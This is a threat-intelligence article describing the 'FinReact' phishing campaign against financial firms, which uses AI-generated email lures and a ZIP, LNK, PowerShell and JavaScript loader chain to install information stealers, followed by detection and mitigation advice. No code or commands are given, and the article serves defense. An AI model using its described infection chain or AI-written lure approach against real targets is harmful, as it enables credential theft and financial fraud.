AI-Powered 'FinReact' Phishing Campaign Targets Financial Sector with Evasive JavaScript Loader

'FinReact' Phishing Campaign Uses AI-Generated Lures and 'GhostScript' Loader to Target Banks

HIGH
July 1, 2026
6m read
PhishingMalwareThreat Intelligence

Related Entities

Organizations

Proofpoint

Products & Tech

Generative AI

Other

GhostScriptVidar IcedID

Full Report

Executive Summary

Security researchers at Proofpoint have identified a sophisticated, large-scale phishing campaign, 'FinReact', targeting the financial services sector. This operation is notable for its use of generative AI to craft highly convincing and personalized email lures, making them difficult to detect. The campaign's goal is to deploy information-stealing malware, such as Vidar and IcedID, by tricking victims into executing a malicious LNK file. This triggers a multi-stage infection process involving a new, evasive JavaScript loader named GhostScript. The campaign demonstrates a significant evolution in the tactics of financially motivated cybercriminals.


Threat Overview

The 'FinReact' campaign represents a significant step up in the quality of phishing attacks. By leveraging generative AI, the attackers can create emails that are grammatically perfect, contextually relevant, and personalized to the target, often appearing as a reply to an existing email thread.

  • Targeting: The campaign is specifically aimed at employees in banks, investment firms, and other financial institutions.
  • Initial Delivery: The attack begins with an AI-generated email containing a password-protected ZIP file. The password is included in the body of the email, a technique designed to bypass automated email attachment scanners.
  • Infection Chain:
    1. The user opens the ZIP file and then the malicious LNK shortcut inside.
    2. The LNK file executes a PowerShell command.
    3. The PowerShell command downloads the GhostScript JavaScript loader.
    4. GhostScript performs anti-analysis checks (e.g., for sandboxes and VMs).
    5. If the checks pass, it downloads and executes the final payload, which is an information stealer like Vidar or IcedID.

Technical Analysis

The GhostScript loader is a key component of this campaign. It is a novel piece of malware designed for evasion. Its ability to check for virtualized environments before proceeding makes it difficult for automated analysis systems to detonate and study the final payload. This ensures the attackers' more valuable malware (the info-stealers) are only exposed in real victim environments.

The use of AI for lure creation is the other major innovation. This allows the attackers to scale their operation without sacrificing quality, producing thousands of unique, high-quality phishing emails that can bypass reputation-based and signature-based email security filters.

MITRE ATT&CK TTPs

Impact Assessment

A successful compromise can have significant financial and operational consequences for the targeted firms:

  • Credential Theft: The theft of browser credentials and session cookies can allow attackers to bypass MFA and gain access to corporate banking portals, trading platforms, and internal systems.
  • Financial Fraud: Attackers can use the stolen access to initiate fraudulent transactions, a primary goal for financially motivated actors.
  • Data Breach: The info-stealers can harvest a wide range of sensitive data from the compromised workstation, leading to a data breach.
  • Ransomware Foothold: Stolen credentials are often sold to or used by other threat actors, including ransomware groups, as an initial access vector for more disruptive attacks.

Detection & Response

  • Detection:
    • Email Security: Look for emails containing password-protected ZIP files with the password in the body. While this is a legitimate use case sometimes, it is also a common evasion tactic and should be flagged for higher scrutiny.
    • Endpoint Monitoring: Monitor for the execution of LNK files that spawn PowerShell. Create EDR rules to detect and block this behavior. D3FEND's Process Analysis is key here.
    • PowerShell Logging: Enable PowerShell Script Block Logging (Event ID 4104) to capture the content of executed PowerShell scripts, which can reveal the download URL used by the LNK file.
  • Response:
    • If a user reports falling for the phish, immediately isolate their workstation from the network.
    • Reset all of the user's credentials, especially for financial and cloud-based systems.
    • Perform a forensic analysis of the machine to identify the final payload and any C2 communication.

Mitigation

  • User Training: This is critical. Train users to be suspicious of any email with an attachment, especially ZIP files, and to never open files from unverified sources. They should be taught to report suspicious emails immediately.
  • Block LNK files: Where possible, configure email gateways to block incoming LNK files within ZIP archives. Or, configure Windows to prevent LNK files from being executed from network or removable drives.
  • Attack Surface Reduction (ASR): Use Microsoft Defender's ASR rules to block office applications and script execution from creating child processes, which can break the infection chain.
  • Endpoint Hardening: Restrict the use of PowerShell for standard users where it is not required for their job function.

Timeline of Events

1
July 1, 2026
This article was published

MITRE ATT&CK Mitigations

Training users to recognize phishing indicators, especially those involving unusual attachments like password-protected ZIPs, is the first line of defense.

Using Attack Surface Reduction (ASR) rules or application control to block the execution of scripts and LNK files from email can prevent the infection chain from starting.

Modern EDR/AV solutions with behavioral analysis can detect and block suspicious activities like a LNK file launching PowerShell to download a payload.

Email gateways should be configured to scan and potentially block or quarantine password-protected archives, which are a common malware delivery technique.

D3FEND Defensive Countermeasures

Given the use of sophisticated AI-generated lures, technical controls alone may not be sufficient. A robust, ongoing security awareness training program is essential. For the financial sector employees targeted by FinReact, this training should specifically focus on the TTP of receiving password-protected ZIP files with the password in the email body. Phishing simulations that mimic this exact technique should be conducted regularly to condition users to recognize and report such emails rather than opening the attachments. A well-trained user is the most effective sensor for detecting high-quality phishing attempts.

Implement application control policies to prevent the execution of unexpected scripts and files. Specifically, configure Windows Attack Surface Reduction (ASR) rules to block the execution of LNK files and to prevent scripts from launching downloaded content. For example, the ASR rule 'Block execution of potentially obfuscated scripts' can interfere with the GhostScript loader. A more stringent approach is to use a tool like AppLocker to deny the execution of LNK files and scripts from user-writable locations like the Downloads folder or AppData, which would break the FinReact infection chain at its earliest stage.

Enable PowerShell Script Block Logging (Event ID 4104) and Module Logging (Event ID 4103) across all endpoints via Group Policy. The FinReact campaign uses a malicious LNK file to launch a PowerShell download cradle. While the initial command might be simple, detailed logging will capture the full content of any de-obfuscated scripts or further commands executed in memory. This provides invaluable forensic data for incident response and can be fed into a SIEM to create high-fidelity alerts for suspicious PowerShell activity, such as download cradles or anti-analysis checks.

Article Author

Jason Gomes

Jason Gomes

• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Threat Intelligence & AnalysisSecurity Orchestration (SOAR/XSOAR)Incident Response & Digital ForensicsSecurity Operations Center (SOC)SIEM & Security AnalyticsCyber Fusion & Threat SharingSecurity Automation & IntegrationManaged Detection & Response (MDR)

Tags

phishingaisocial engineeringmalwareinfostealericedidvidarfinancial services

📢 Share This Article

Help others stay informed about cybersecurity threats

🎯 MITRE ATT&CK Mapped

Every tactic, technique, and sub-technique used in this threat has been identified and mapped to the MITRE ATT&CK framework for consistent, actionable threat language.

🧠 Enriched & Analyzed

Observables and indicators of compromise (IOCs) have been extracted and cataloged. Risk has been assessed and correlated with known threat actors and historical campaigns.

🛡️ Actionable Guidance

Detection rules, incident response steps, and D3FEND-aligned mitigation strategies are included so your team can act on this intelligence immediately.

🔗 STIX Visualizer

Structured threat data is packaged as a STIX 2.1 bundle and can be visualized as an interactive graph — relationships between actors, malware, techniques, and indicators.

Sigma Generator

Sigma detection rules are derived from the threat techniques in this article and can be converted for deployment across any major SIEM or EDR platform.